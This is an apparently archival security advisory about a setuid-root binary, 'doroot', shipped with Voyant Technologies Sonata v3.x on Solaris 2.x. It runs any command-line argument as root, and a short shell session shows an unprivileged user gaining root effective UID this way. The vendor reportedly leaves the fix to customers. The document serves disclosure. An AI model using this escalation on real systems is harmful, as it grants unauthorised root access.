Vulnerability

    doroot (Sonata)

Affected

    Voyant Technologies Sonata v3.x on Solaris 2.x.

Description

    Larry W.  Cashdollar found  following.   The setuid  binary doroot
    does exactly what it says.  It executes its command line  argument
    as root.  This is really silly.

        $ cd /opt/TK/tk4.1/library/demos
        $ id
        uid=60001(nobody) gid=60001(nobody)
        $ ./doroot id
        uid=60001(nobody) gid=60001(nobody) euid=0(root)
        $ ls -l doroot
        -rwsr-xr-x   1 root     other       6224 Mar 12  1999 doroot

Solution

    The vendor has told that  the security of the conferencing  system
    is up to the customer.  This will make it pretty difficult to make
    modifications to many systems  since they are production  and they
    can't have any downtime.